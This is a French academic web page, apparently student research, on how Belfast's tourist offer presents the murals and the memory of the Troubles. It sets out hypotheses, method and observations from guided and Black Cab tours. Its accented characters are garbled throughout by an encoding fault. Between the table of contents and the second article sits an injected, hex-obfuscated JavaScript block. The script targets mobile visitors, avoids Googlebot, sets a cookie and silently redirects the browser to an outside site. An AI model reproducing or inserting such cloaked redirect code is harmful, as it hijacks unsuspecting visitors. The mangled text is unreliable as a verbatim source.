Archives de catégorie : Tourisme

ProblA�matisation

Roland Barthes A�crivait : A� Je ne sais si, comme le dit le proverbe, les choses rA�pA�tA�es plaisent, mais je crois que du moins elles signifient. A�1. Ainsi, ce sont donc les significations de ces rA�pA�titions qui seront au centre de nos recherches.

Les questions que nous nous posons, dans ce travail sont les suivantes : Quelles reprA�sentations des murals de Belfast alimentent un cercle da��images? Quelles significations ce cercle prend-il dans le contexte post-conflictuel de la ville?

Pour y rA�pondre, nous comptons A�tudier les images visuelles et les discours produits autour du tourisme.
Ainsi, nous A�mettons l’hypothA?se, en nous appuyant sur nos recherches prA�liminaires, que certaines fresques sont particuliA?rement frA�quentes dans la��environnement touristique. Notre but est non seulement de rendre compte de cette redondance da��images et da��identifier de la sorte un cercle da��images, mais aussi de chercher aI�comprendre la��origine et les consA�quences de cette sur-reprA�sentation. Nous envisageons, par exemple, la possibiliteI? que les images des murals da��un cA?tA� du conflit soient davantage mises en avant par rapport A� la��autre.

ClA�ment Cheroux dans son ouvrage Diplopie, identifie des reprA�sentions de thA�matiques similaires prA�sentA�es en boucle dans les mA�dias A�tasuniens, menant ainsi A� la crA�ation de diverses catA�gories da��image-type des attentats contre les tours du World Trade Center, le 11 septembre 20012. Dans une approche similaire, nous nous efforcerons da��identifier des images-types pour les murals de Belfast, ainsi que les thA�matiques que celles-ci illustrent.

Une fois notre A�chantillon final A�tabli, nous nous adonnerons aI�une analyse dA�taillA�e de celui-ci, en questionnant les images le constituant. Comme mentionnA� plus haut, nous nous efforcerons de dA�finir des images-types de murals, aux raisons de leurs prA�sences iconographiques rA�pA�tA�es, A� leurs localisations, etc.
Nos rA�flexions se porteront donc principalement sur les images de murals constituant par leurs rA�pA�titions un cercle plus ou moins fermA�. Le cercle sera formA� da��images partagA�es par des agents touristiques aux visiteurs de la ville, qui sa��en empareront, les partageront A� leur tour autour da��eux, notamment A� travers les rA�seaux sociaux. Ainsi faisant, ils entretiennent la diffusion de la reprA�sentation da��un mural auprA?s de potentiels touristes, et par la mA?me occasion, renforcent la��image promue par les agents touristiques.

La mise en circulation rA�pA�tA�e des reprA�sentations d'un mA?me mural, entre les agents touristiques et les touristes. LA�a Zignani
La mise en circulation rA�pA�tA�e des reprA�sentations d’un mA?me mural, entre les agents touristiques et les touristes.

Notre premiA?re hypothA?se est donc, comme nous venons de le prA�senter, la��existence da��un cercle da��image autour des murals. Nous avanA�ons aussi la possibilitA� que la��un des cA?tA� du conflit passA� soit sur-reprA�sentA� par rapport A� la��autre.

Dans un premier temps, nous prA�senterons donc les mA�thodes employA�es pour la rA�colte de donnA�es. Celles-ci seront mobilisA�es et analysA�es dans une seconde partie, oA? nous reviendrons sur nos hypothA?ses et oA? nous A�laborerons diverses parties thA�matiques.


1- Barthes, R., Mythologies, Paris, Le Seuil, 1957, p.10
2- ChA�roux, C., Diplopie, Paris, Le Point du Jour, 2009, p.22

 


a�? INTRODUCTION

a�? PROBLA�MATISATION

a�? MA�THODOLOGIE

a�? PARTIE THA�MATIQUE
a�? CONCLUSION

 var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Le rA?le de la��offre touristique belfastoise dans la perpA�tuation de la mA�moire des « Troubles »

ParA�Emilie Guibert et Valentina Ferreira GutiA�rrez

1. Introduction

1.1A� Contexte

La��Irlande du Nord fut le thA�A?tre da��intenses conflits entre le 5 octobre 1968 – date de la Civil Right March A� Derry – et le 10 avril 1998 a�� date qui marque la��Accord du Vendredi Saint[1]. Ces derniers ont opposA� les rA�publicains, militant pour le ralliement A� la��Irlande, et les loyalistes, fidA?les A� la couronne da��Angleterre. La plupart des affrontements civils se sont dA�roulA�s A� Belfast, ville considA�rA�e comme A�tant la A� miniature urbaine du conflit national A� (Ballif, 2012, p.116). Ce contexte da��affrontements na��A�tait pas propice au dA�veloppement touristique de la capitale qui pA?tit durant de longues annA�es des images de violence et de sA�grA�gation diffusA�es A� travers le monde. En effet, dA?s 1969, on assiste A� la construction da��un mur, dit A�A�de la paixA�A�, sA�parant physiquement les communautA�s catholiques et protestantes. La pA�riode des Troubles contribua au dA�veloppement da��un imaginaire touristique associant Belfast A� la��instabilitA� et A� la��incomprA�hension culturelle (Morand, 2009), ce qui explique le fait que la��Irlande du Nord na��ait pas A�tA� privilA�giA�e en tant que destination touristique durant prA?s de trente ans. Cependant, la��accord de paix de 1998 marque le dA�but de la��expansion da��un nouveau tourisme en Irlande du Nord. Depuis, les compagnies aA�riennes desservent A� nouveau la capitale rA�gionale et le nombre de visiteurs serait passA� de 1.6 millions en 1999 A� 6.8 millions en 2006 (Morand, 2009, p.39). Les moteurs du dA�veloppement de ce nouveau tourisme sont multiples: da��une part, le gouvernement nord-irlandais sa��est servi de cet instrument afin de diversifier ses ressources A�conomiques (Legrand, 2002); da��autre part, cette ouverture au tourisme a contribuA� au renouvellement de la��image de la ville (Ballif, 2012). Dans le cadre de cette politique touristique, des espaces urbains et les traces du conflit sont A� mis en tourisme A� afin de susciter la��intA�rA?t des touristes tout en perpA�tuant la mA�moire de ce dernier.

Aujourda��hui, Belfast fait partie des destinations nouvellement A� rA�-ouvertes A� au tourisme (Morand, 2009) : les traces matA�rielles des Troubles ont A�tA� patrimonialisA�es et sont exploitA�es en tant que ressources touristiques par des acteurs privA�s et publics (Naef, 2013). Ce patrimoine qui comprend les murals, symboles de la lutte entre deux communautA�s (Ballif, 2014) et tA�moignages de la guerre civile, sont trA?s prisA�s par les visiteurs. Ceux-ci sont mentionnA�s dans les guides touristiques comme A�tant des A�hauts-lieux de la ville A� (Ballif, 2012, p.118), de par leur reprA�sentativitA� de la��histoire de Belfast. Dans le cadre de notre travail, nous les considA�rerons comme A�tant des supports de mA�moire, car les discours les accompagnant sont souvent porteurs da��expA�riences personnelles. On le verra par la suite, les acteurs touristiques ont tendance A� mettre en scA?ne leur vA�cu lorsqua��ils font visiter certains monuments ou lieux historiques. Mis A� part les murals, il existe da��autres supports de mA�moire dont la nature varie.

Il existe da��une part des symboles matA�riels parmi lesquels figurent des musA�es, A�des mA�moriels ou des quartiers ayant A�tA� touchA�s par les affrontements, comme ceux de Shankill et Falls. Da��autre part, on retrouve aussi des supports de mA�moire immatA�riels et symboliques tels que des tA�moignages oraux. Cependant, malgrA� cette diversitA� de supports, les murals constituent, au vu de ce que nous avons pu observer lors de notre sA�jour, la��A�lA�ment le plus rA�current proposA� par la��offre touristique orientA�e vers la thA�matique des Troubles. Enfin, le fait que les touristes prA?tent une attention grandissante A� la��A�gard de ces sites emblA�matiques du conflit reflA?te, selon nous, leur dA�sir de participer A� la perpA�tuation de la mA�moire de ce dernier (Morand, 2009, p. 45).

1.2 Les concepts relatifs au tourisme mA�moriel

Mener une A�tude dans ce contexte implique de dA�finir au prA�alable certains concepts. Nous tirerons de la littA�rature certaines dA�finitions afin de poser un cadre thA�orique qui nous servira de base pour notre dA�veloppement. Nous dA�finirons donc de maniA?re prA�cise ce que nous entendons lorsque nous mentionnons les notions de mA�moire, lieu de mA�moire, mise en tourisme et tourisme mA�moriel.

Dans sa thA?se, Anne-CA�line Morand reprend les dires de Pierre Morand qui stipule que A�A�(a��) la mA�moire est la vie, toujours portA�e par des groupes vivants et A� ce titre, elle est en A�volution permanente, ouverte A� la dialectique du souvenir et de la��amnA�sie inconsciente de ses dA�formations successives, vulnA�rable A� toutes les utilisations et manipulations, susceptible de longues latences et de soudaines revitalisations.A�A� (Morand, 2009, p.9). La mA�moire sa��oppose donc A� la��histoire dans le sens oA? elle fait rA�fA�rence A� des faits dont il existe encore des tA�moins vivants, crA�ant de ce fait un lien entre les temps chronologiques du prA�sent et du passA�. La mA�moire suppose donc qua��une personne physique soit porteuse de cette derniA?re. Par ailleurs, la mA�moire est sujette A� des transformations au fil de sa transmission contrairement A� la��histoire qui est une reconstruction incomplA?te mais immuable de ce qui na��est plus (Morand, 2009, p.9).

Il existe un lien entre mA�moire et espace, car la mA�moire tend A� sa��incarner dans des lieux ou des reprA�sentations de lieux (Petitier, 1989). De lA� dA�coule la notion de lieu de mA�moire. Selon Jean-Didier Urbain, un lieu de mA�moire na��est pas une destination comme les autres. Elle na��existe pas en soi, mais par un regard spA�cifique. A�Celui qui se souvient transforme un simple lieu en rA�ceptacle da��un passA� toujours vivant dans les mentalitA�s (Urbain, 2003). Le lieu de mA�moire peut A?tre topographique, monumental ou symbolique (Petitier, 1989) mais reste indissociable de celui qui le pense. Tout comme dans la notion de mA�moire explicitA�e ci-dessus, on retrouve, dans la dA�finition du lieu de mA�moire, le lien existant entre ce qui est passA� et ce qui est prA�sent.

Ces lieux peuvent, selon la��expression employA�e par la��Equipe MIT, A?tre mis en tourisme (Equipe MIT, 2000). Cette mise en tourisme consiste en la construction da��une dA�sirabilitA� de ces lieux potentiellement associA�s A� la violence, A� la mort, au deuil, et au sacrifice (Hertzog, 2012). Dans le cas de notre A�tude, les lieux de mA�moire sont construits par les acteurs touristiques comme destinations A�sA�duisantes pour le visiteur. Ce processus tend A� transmettre un message contribuant A� la construction da��une image de la ville censA�e susciter la��intA�rA?t du touriste (Hertzog, 2012).

Enfin, ces lieux de mA�moire sont mis en tourisme dans le cadre da��un tourisme mA�moriel. La dA�finition de ce type particulier de tourisme mentionnA�e par Jean-Didier Urbain est la suivante: A�A la��intA�rieur da��un territoire, il est outil de consolidation da��une unitA� culturelle, da��une construction identitaire, da��une formation des peuples. A la��extA�rieur, pour le visiteur A� la culture da��accueil, il est vecteur de diffusion da��une image, da��une identitA� culturelle A� (Urbain, 2003, p.6). Le tourisme mA�moriel suppose donc un individu porteur da��une mA�moire, qua��il transmettrait A� des fins de crA�ation identitaire et de lutte contre la��oubli. Ca��est un tourisme du passA� sans A?tre un tourisme passA�iste ou nostalgique qui reviendrait A� un simple A� retour aux origines A� (Urbain, A�2003). Il permet de perpA�tuer la mA�moire des A�vA�nements passA�s en les rapatriant dans le prA�sent et en les transmettant A� autrui. Vecteur de conscientisation historique de celui qui en fait la��expA�rience, ce type de tourisme contribue A� la��acceptation du passA� et participe indirectement au maintien de la paix sociale en crA�ant une certaine da��intercomprA�hension culturelle.

Notre cadre thA�orique A�tant dA�fini, nous allons pouvoir passer A� la prA�sentation des enjeux sous-jacents A� notre thA�matique, ainsi qua��A� la problA�matique qua��elle soulA?ve. Au fil de ce travail, nous reviendrons souvent sur ces diffA�rentes dA�finitions.

1.3 ProblA�matique et enjeux

Ca��est dans le cadre de la mise en tourisme da��A�lA�ments relatifs aux Troubles que notre dA�marche sa��inscrit. Dans une ville qui a souffert de violents affrontements, les murals, les mA�moriels et certains quartiers constituent des preuves matA�rielles des A�vA�nements passA�s. Il sera question ici de comprendre comment le tourisme belfastois cherche A� faire connaA�tre la��histoire des Troubles aux visiteurs. Notre travail consistera en une analyse de la��offre touristique A� travers la perspective du tourisme mA�moriel, ou tourisme de mA�moire. Comme mentionnA� ci-dessus, ce type de tourisme A� vocation pA�dagogique fait rA�fA�rence A� un phA�nomA?ne ancien ayant dA�butA� avec la PremiA?re Guerre Mondiale, et qui a contribuA� dA?s les annA�es 1990 A� la production da��un imaginaire touristique (Hertzog, 2012). Dans ce contexte, les traces de guerre deviennent une ressource mobilisA�e par les acteurs de la��offre touristique. Nous analyserons donc comment ces derniers font appel A� la mA�moire du conflit ayant sA�vi entre 1969 et 1998 en A�tudiant la mise en tourisme des murals et des autres A�lA�ments porteurs de mA�moire.

A� travers notre approche mA�morielle de la��offre touristique belfastoise, nous pouvons voir A�merger deux enjeux. PremiA?rement, on constate que les discours da��anciens prisonniers politiques et da��autres personnes ayant vA�cu ou participA� au conflit sont mobilisA�s par la��industrie touristique. Da��une part, nous pouvons penser que cette mise en scA?ne sa��inscrit dans une logique de recherche de profit, car les touristes ont tendance A� A?tre attirA�s par les anecdotes personnelles. De ce fait, cette tendance peut A?tre instrumentalisA�e A� des fins A�conomiques. Da��autre part, la mise en scA?ne de discours peut A�galement rA�pondre A� la volontA� de transmettre A� autrui la mA�moire des A�vA�nements passA�s. Dans le cadre de notre thA�matique, nous allons plutA?t nous pencher sur ce second aspect car il peut A?tre mA� par un enjeu de sensibilisation. Lorsque nous avons rencontrA� un conducteur de Black Cab, nous lui avons posA� des questions sur les motivations qui la��ont poussA� A� devenir guide touristique. Ce dernier nous a alors rA�pondu qua��il A�tait nA�cessaire que les individus soient conscients de la gravitA� de la situation ayant sA�vi A� Belfast. De ce fait, il est selon lui primordial de sensibiliser le visiteur par le biais de la transmission da��expA�rience personnelle. De maniA?re gA�nA�rale, il sa��agit donc de faire comprendre aux touristes pourquoi les A�vA?nements se sont dA�roulA�s ainsi, en explicitant les raisons qui ont poussA� les acteurs prA�sents A� la��A�poque A� agir de la sorte. Plus qua��une justification de leurs actes, ces expA�riences personnelles sont mobilisA�es dans le but de sensibiliser les touristes A� la situation locale afin que ces derniers assimilent au mieux la mA�moire du conflit.

DeuxiA?mement, nous avons dA�celA� un enjeu pA�dagogique lors de notre analyse de la��offre touristique. On peut considA�rer que les acteurs de ce milieu ont pour but da��instruire le visiteur dans le cadre da��un tourisme mA�moriel. Outre le fait da��inculquer certaines connaissances historiques, une des raisons de la vocation pA�dagogique de ce type de tourisme peut A?tre, selon nous, de promouvoir la��intercomprA�hension culturelle. En effet, nous pensons que le fait de transmettre la��histoire du conflit A� autrui par le biais du tourisme mA�moriel peut engendrer plus de rA�ceptivitA�, permettant une meilleure assimilation des A�lA�ments historico-culturels locaux. Ce tourisme pA�dagogique conduit donc celui qui en fait la��expA�rience A� adopter une attitude plus critique envers la situation belfastoise et envers lui-mA?me, A� condition que celui-ci effectue un travail de distanciation et ne considA?re pas chaque rA�cit personnel comme A�tant la seule et unique version des A�vA�nements passA�s.

1.4 Question de recherche et hypothA?ses

AprA?s avoir A�tabli le contexte ainsi que les enjeux de notre thA�matique, nous allons dA�finir notre question de recherche. On observe dans la��offre touristique de la capitale rA�gionale une volontA� de mettre en avant son identitA� ainsi que la maniA?re dont la population a vA�cu le conflit. Ce processus sa��opA?re A� travers la prA�sentation de la mA�moire belfastoise aux touristes (Morand, 2009, p.56). La��offre touristique actuelle diffA?re beaucoup de celle qui a directement fait suite A� la pA�riode des Troubles. Peu de temps aprA?s la��Accord de Paix de 1998, il sa��agissait de faire oublier ce sombre A�pisode a�� ca��est da��ailleurs ce que certains prestataires publics continuent de faire, pour des raisons de neutralitA�, ou dans la��espoir de donner une meilleure image de la ville.

Cependant, la mA�moire du conflit est aujourda��hui mise en avant par divers prestataires, notamment par des agences touristiques privA�es. Ces derniers proposent diffA�rents types de circuits, appelA�s Political Tours (Morand, 2009, p.63). Ca��est dans le cadre de la mise en scA?ne de la mA�moire par la��offre touristique que rA�side tout la��intA�rA?t de notre travail. La question A� laquelle nous allons tenter de rA�pondre sera donc la suivante:

Comment la��offre touristique belfastoise inclut-elle le touriste A� la production de mA�moire? Comment la��espace est mobilisA� par la��offre touristique belfastoise dans le cadre de la territorialisation de la mA�moire?

Trois hypothA?ses dA�coulent de ces deux questionnements. Celles-ci nous aideront A� orienter nos recherches.

H1: Les acteurs de la��offre touristique mettent en scA?ne des rA�cits personnels dans le cadre de visites interactives qui stimulent la co-construction de mA�moire.

A travers le concept de A�A�rA�cits personnelsA�A�, nous entendons toutes les expA�riences vA�cues et les tA�moignages du conflit mis en avant par la��offre touristique. De maniA?re gA�nA�rale, nous nous attendons A� faire la��expA�rience de visites touristiques interactives, durant lesquelles notre opinion et notre ressenti sont sollicitA�s. En ce qui concerne les prospectus touristiques des agences locales, nous pensons y retrouver des expressions faisant allusion A� un retour dans le temps, ou nous proposant une certaine immersion dans la��A�poque des Troubles, ce qui aurait pour but la stimulation de la co-construction de mA�moire.

Lors des Political Tours, nous nous attendons A� A?tre plongA�es dans le vA�cu trA?s personnel des guides touristiques ayant participA� A� la pA�riode des Troubles. Ainsi, cela nous aidera A� nous rapprocher de ces derniers et A� dA�velopper une certaine empathie envers eux. Ce processus conduit A� un glissement entre la position de chercheur et celle de touriste, ce qui peut potentiellement biaiser la validitA� de nos rA�sultats. Cependant, nous effectuerons un travail de distanciation et da��objectivation lors du traitement de notre matA�riau da��analyse, bien que la��objectivitA� totale constitue un objectif inatteignable.

H2: La��offre touristique met en place des circuits pA�dagogiques qui amA?nent le visiteur A� participer activement A� la perpA�tuation de la mA�moire du conflit.

Lors des visites touristiques, nous nous attendons A� A?tre instruites sur la��histoire des Troubles. De ce fait, nous espA�rons qua��A� la fin de notre sA�jour A� Belfast, nous disposerons de tous les A�lA�ments nA�cessaires pour nous forger notre propre opinion A� la��A�gard de cette pA�riode. Le fait da��avoir assimilA� en profondeur les A�vA�nements ayant sA�vi durant les Troubles nous permettra peut-A?tre da��A?tre capables de transmettre ce savoir acquis A� autrui, ce qui fera de nous des personnes actives dans la perpA�tuation de la mA�moire de la��histoire belfastoise.

H3: Il existe un processus de territorialisation de la mA�moire en certains lieux spA�cifiques.

Finalement avec cette derniA?re hypothA?se, nous nous attendons A� voir une rA�partition et/ou une territorialisation de la mA�moire en certains lieux ou secteurs spA�cifique de la ville. La territorialisation de la mA�moire conduit la��individu A� associer un souvenir A� un certain lieu, elle peut donc A?tre exploitA�e A� des fins touristiques.

2. MA�thodologie

Nous allons A� prA�sent tenter de rA�pondre A� nos questions de recherche par le biais de la vA�rification de nos hypothA?ses sur le terrain. Pour ce faire, nous analyserons les modalitA�s de la��offre touristique belfastoise qui tendent A� inclure le visiteur A� la production mA�morielle.

Nos expA�riences touristiques A� Belfast furent nombreuses et nous avons sA�lectionnA� celles qui avaient trait A� notre thA�matique, A� savoir : la visite guidA�e de la Linen Library et des archives du conflit, un City Tour en bus proposA� par la compagnie privA�e Belfast City Sightseeing open top Bus tour, la dA�couverte des quartiers de Falls et Shankill en Black Cab, la visite du Centre Culturel GaA�lique, et enfin les visites de la��Ulster Museum ainsi que celle du Loyalist Museum a�� Andy Tyrie Interpretive Centre accompagnA�e da��un tour dans le quartier de East Belfast. Parmi les acteurs touristiques que nous avons analysA�s, certains sont donc issus de compagnies publiques, et da��autres de compagnies privA�es. Comme nous na��avons pas toujours A�tA� en mesure de savoir si les acteurs touristiques rencontrA�s A�taient issus du domaine public ou du privA�, nous avons dA�cidA� de ne pas attacher trop da��importance A� cette distinction.

Aussi, nous sommes conscientes que cette liste est non-exhaustive et que notre regard sur ces visites a potentiellement A�tA� biaisA� par nos objectifs de recherche. Notre statut de chercheuses nous inclut dans une certaine catA�gorie de touriste, A� savoir, celle des individus intA�ressA�s par la dimension pA�dagogique et la dA�marche scientifique dans la visite da��un lieu (Crahay, 2014). De ce fait, nous nous trouvons dans une position intermA�diaire entre celle du touriste et celle du chercheur scientifique. Cette situation na��est pas sans consA�quence.

Da��un cA?tA�, nous aurons tendance A� nous A�loigner de la position de touriste, car nous aurons peut-A?tre un point de vue plus critique que ces derniers. En effet, contrairement aux touristes en recherche de divertissement, nous vivrons ces expA�riences en restant focalisA�es sur nos objectifs de recherche.

De la��autre, nous na��adopterons pas totalement la posture da��un chercheur scientifique du fait que nous baserons notre analyse sur notre ressenti. De ce fait, nous serons nous-mA?mes objets de notre recherche, ce qui pourrait altA�rer la validitA� de nos conclusions.

Dans le cadre de nos deux premiA?res hypothA?ses, le fait da��A?tre A� la fois chercheuses et objet de recherche biaisera la��interprA�tation de nos rA�sultats, et nous posera problA?me lorsqua��il sa��agira de vA�rifier la��interactivitA� des visites et leur aspect pA�dagogique. En effet, afin de neutraliser la��effet de ce glissement, il nous aurait fallu interroger da��autres touristes ayant participA� aux mA?mes visites, et A�ventuellement effectuer une observation participante afin que notre matA�riel da��analyse soit plus reprA�sentatif. Malheureusement, nous na��avons pas A�tA� en mesure de mener A� bien ces dA�marches, faute de temps et de moyens.

Plus concrA?tement, afin de rA�pondre A� nos questions de recherche, nous avons A�tA� trA?s attentives A� la faA�on dont les murals et les autres A�lA�ments ayant trait au conflit sont prA�sentA�s lors des visites. De ce fait, nous avons analysA� comment les agences proposent de nous A�A�faire visiterA�A� la ville. Ensuite, nous avons rA�coltA� un maximum de matA�riel publicitaire A� analyser, comme des prospectus et des affiches touristiques. Nous avons par ailleurs demandA� conseil A� un office de tourisme ainsi qua��A� la rA�ception de notre auberge, dans le but de voir le type de visites proposA�. En analysant ces documents, nous avons tentA� de repA�rer des slogans-types invitant le visiteur A� sa��immiscer dans la��atmosphA?re des Troubles.

Enfin, un carnet de terrain nous a A�tA� essentiel. Lors des visites guidA�es, nous avons relevA� les A�lA�ments qui A�taient pour nous susceptibles da��inclure le visiteur A� la perpA�tuation de la mA�moire du conflit. En effet, au niveau de la��offre touristique, les visites ayant pour thA�matique le conflit nord-irlandais et tendant A� inclure le visiteur A� la production de mA�moire se dA�clinent en plusieurs modalitA�s, notamment la mise en scA?ne de rA�cits personnels et la valorisation de circuits pA�dagogiques. Par exemple, les Black Cabs proposent au visiteur de faire un tour de la ville. Souvent, le chauffeur est un ancien prisonnier politique qui raconte A�les A�vA�nements passA�s selon son appartenance religieuse, ce qui fait que le touriste prendra connaissance de la ville A� travers les yeux da��un protestant ou da��un catholique (Lisle, 2006). La��intA�rA?t de ce genre de visite sera de voir en quoi ce processus nous implique dans la co-construction de mA�moire.

3. ElA�ments da��analyse

3.1 Deux modalitA�s touristiques fonctionnant dans un cadre interactif

3.1.1 La mise en scA?ne de rA�cits personnels

a) Un tourisme informatif et historique

Parmi nos diverses expA�riences, deux da��entre elles ne nous permettent pas da��affirmer la��hypothA?se selon laquelle la��offre touristique met en scA?ne des rA�cits personnels dans le cadre du tourisme mA�moriel. La premiA?re visite durant laquelle nous na��avons relevA� que trA?s peu da��A�lA�ments relatifs aux Troubles est celle du City Hall. Aucun rA�cit personnel na��a A�tA� mis en avant par notre guide qui nous a prA�sentA� une vision relativement institutionnelle de la��histoire de la ville. La seconde visite durant laquelle la��interaction et la mise en scA?ne de rA�cits personnels na��est pas de mise est celle proposA�e par les Belfast City Sightseeing open top Bus tour : lors de cette visite, les informations A�taient transmises de maniA?re impersonnelle. Cette impression peut A?tre due au fait que cette compagnie, bien que privA�e, possA?de une licence du dA�partement de la��environnement qui les oblige A� rester neutre. Proposer des rA�cits personnels pourrait paraA�tre trop partial pour ce genre de visite. Selon nous, ces deux visites ne sa��inscrivent pas dans le cadre da��un tourisme mA�moriel mais plutA?t dans celui da��un A� tourisme informatif A� ou A� historique A�.

b) Des rA�cits personnels dA�guisA�s?

Nos impressions sont plus mitigA�es quant A� la visite du Loyalist Museum et du quartier de East Belfast: nos deux guides na��ont pas mis leurs propres expA�riences en avant et na��ont que trA?s peu parlA� da��eux. Cependant, nous avons senti dans leur discours que ces derniers ont A�tA� impliquA�s da��une maniA?re ou da��une autre dans le conflit, car ils utilisaient le pronom personnel A� nous A� lorsqua��ils nous prA�sentaient les actions armA�es perpA�trA�es par les groupes protestants (UFF, UDA, UYM)[2]. Aussi, la tension A�tait palpable lorsqua��ils nous parlaient des victimes loyalistes et nous prA�sentaient les nombreux mA�moriels protestants. MA?me si cette visite na��a pas A�tA� des plus interactive et que nous na��avons dA�celA�, a priori, aucun rA�cit personnel, sa neutralitA� na��a pas A�tA� totale: selon nous, le fait de prA�senter les forces protestantes comme A�tant de A� bons justiciers A�, peut avoir pour finalitA� de nous rallier A� leur cause. Nous pouvons donc considA�rer cela comme une invitation A� la perpA�tuation de A�A�leurA�A� mA�moire du conflit. En effet, nos deux guides nous ont expliquA� avoir crA�A� ce musA�e en rA�action au succA?s des Black Cabs, majoritairement catholiques, afin de pouvoir, eux aussi, perpA�trer leur version de la��histoire.

Enfin, trois visites nous permettent de vA�rifier la��hypothA?se selon laquelle la��offre touristique met en place des rA�cits personnels dans le but de perpA�tuer la mA�moire du conflit.

c) Un rA�el partage da��expA�riences de vie ?

Dans un premier temps, la partie archive de la Linen Library fut trA?s intA�ressante. Au dA�but, notre guide sa��est attardA� sur un grand livre datant de 1969 qui recense la population de Belfast de la��A�poque ainsi que les rues prA�sentes A� cette date. Ce dernier lui rappelle son enfance, car certains endroits qua��il apprA�ciait A�tant enfant ont A�tA� dA�truits durant les Troubles. En tant que support de mA�moire, ce registre dans lequel figure son grand-pA?re confA?re A� notre guide le statut de mA�diateur : par le biais de ce dernier, il nous a transmis A� la fois la mA�moire de son grand-pA?re, la sienne, mais aussi celle de la gA�ographie passA�e de la ville. Ensuite, des rA�cits personnels ont A�tA� mis en scA?ne par le biais de divers supports: par exemple, on trouve dans ce musA�e des lettres A�crites, durant le conflit, par da��anciens prisonniers en grA?ve de la faim sur du papier toilette ou du papier A� cigarette. Ces derniers, ayant la��interdiction de communiquer avec la��extA�rieur, sa��en servaient pour donner des nouvelles A� leur famille par la��intermA�diaire des prA?tres. Cette fonction a aujourda��hui laissA� la place A� celle de la transmission de mA�moire : en tant que touriste, nous avons eu la��opportunitA� de lire ces rA�cits personnels, et donc de sa��imprA�gner, la��espace da��un instant, du souvenir de quelques individus. Cependant, notre rA?le dans la co-construction et la perpA�tuation de leur mA�moire se limite A� nous remA�morer ces A�crits, car notre capacitA� de retransmission de cette mA�moire est limitA�e, entre autres par la��interdiction de les photographier.

